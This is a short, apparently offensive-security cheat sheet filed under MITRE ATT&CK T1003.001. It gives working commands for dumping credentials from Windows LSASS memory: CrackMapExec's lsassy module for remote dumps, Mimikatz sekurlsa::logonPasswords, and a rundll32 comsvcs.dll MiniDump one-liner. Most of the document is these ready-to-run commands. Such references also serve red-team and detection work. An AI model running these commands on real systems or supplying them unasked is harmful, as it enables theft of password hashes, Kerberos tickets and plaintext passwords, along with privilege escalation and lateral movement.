MITRE ATT&CK, Credential Access, Sub-technique T1003.001
Adversaries commonly abuse the Windows Local Security Authority Subsystem Service (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target because of the sheer amount of sensitive credential material it keeps in memory after users log on (password hashes, Kerberos tickets and keys, and in some configurations plaintext passwords). Reading that memory requires administrator or SYSTEM privileges, so every technique below assumes an elevated context.
```bash
# Dumping LSASS remotely with CrackMapExec (lsassy module)
crackmapexec smb $ip -u $username -p $password -M lsassy
```

```
# Dumping credentials from LSASS memory with Mimikatz (SeDebugPrivilege must be enabled first)
privilege::debug
sekurlsa::logonPasswords
```
```powershell
# Dumping LSASS with the built-in MiniDump export of comsvcs.dll (source: https://twitter.com/inversecos/status/1450331995112804358?s=20&t=rMzsQI6ENH2SYVVaTYTqAA)
# Run from an elevated PowerShell session; the output path is relative to the current directory
rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\output.dmp full;Wait-Process -Id (Get-Process rundll32).id
```